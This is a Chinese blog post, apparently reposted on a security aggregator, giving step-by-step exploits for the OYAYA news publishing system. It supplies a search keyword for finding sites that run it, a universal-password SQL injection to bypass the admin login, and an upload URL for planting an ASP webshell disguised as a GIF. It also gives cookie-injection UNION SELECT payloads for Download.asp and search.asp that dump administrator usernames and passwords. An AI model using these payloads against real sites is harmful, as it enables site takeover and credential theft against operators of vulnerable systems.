凹丫丫新闻发布系统漏洞

没穿底裤 2019年12月31日20:25:57评论854 views字数 1088阅读3分37秒阅读模式
摘要

有二种:1.漏洞很简单'or'='or'后台没有验证.直接进入数据库..
关键字:Design by OYAYA.CN
打开网站首页,最下面就会有管理入口的链接,直接点击那个链接就可以进入网站后台了
然后用万能密码:'or'='or'
我们直接在它网址后面加入admin/uploadpic.asp?actionType=mod&picName=hxhack.asp
注意(hxhack.asp)可以随便修改名字...后缀是asp就可以了
上传一张gif格式的网马,如果成功的话就保存在 网站根目录下面的uppic/hxhack.asp 了
一般小马拉大马,得到webshell,剩下就是提权了。
这个系统的安全性只能用惨不忍睹来形容,不过给我们这些新手练练手刚刚好,毕竟网络安全状况越来越好。这种垃圾也少的很了

有二种:

1.漏洞很简单'or'='or'后台没有验证.直接进入数据库..
关键字:Design by OYAYA.CN
打开网站首页,最下面就会有管理入口的链接,直接点击那个链接就可以进入网站后台
然后用万能密码:'or'='or'
我们直接在它网址后面加入admin/uploadpic.asp?actionType=mod&picName=hxhack.asp
注意(hxhack.asp)可以随便修改名字...后缀是asp就可以了
上传一张gif格式的网马,如果成功的话就保存在 网站根目录下面的uppic/hxhack.asp 了
一般小马拉大马,得到webshell,剩下就是提权了。
这个系统的安全性只能用惨不忍睹来形容,不过给我们这些新手练练手刚刚好,毕竟网络安全状况越来越好。这种垃圾也少的很了

2.cookie注入
是Download.asp文件存在cookie注入
利用代码: javascript:alert(document.cookie="BigClassName="+escape("%25' and 1=2 union select 1,admin,3,password,5,6,7,8,9,10,11,12,13 from admin where 1=1 and 'a'='a"));
打开http://localhost/Download.asp页面,然后在第一个页的IE地址栏中以上利用代码,然后访问http://localhost/Download.asp?页,刷新一次,系统中所有的管理员账号和密码就列出来了。

另外在search.asp页面中同样存在cookie注入,只不过针对search.asp页面的注入语句有所不一样,因为这里是搜索型的注入
漏洞原理就和上面的Download.asp页面中的一样了,下面是利用的方法:
利用代码: javascript:alert(document.cookie="key="+escape("%25%25' and 1=2 union select admin,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin where 1=1 and aleave like '%25%25"));
在确定search.asp页面存在的情况下访问http://localhost/search.asp?otype=title&key=xx,然后在IE地址栏输入以上利用代码后再访问http://localhost/search.asp?otype=title& 页面,刷新,同样的系统全部管理账号密码都暴出来了。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日20:25:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   凹丫丫新闻发布系统漏洞http://cn-sec.com/archives/75108.html

发表评论

匿名网友 填写信息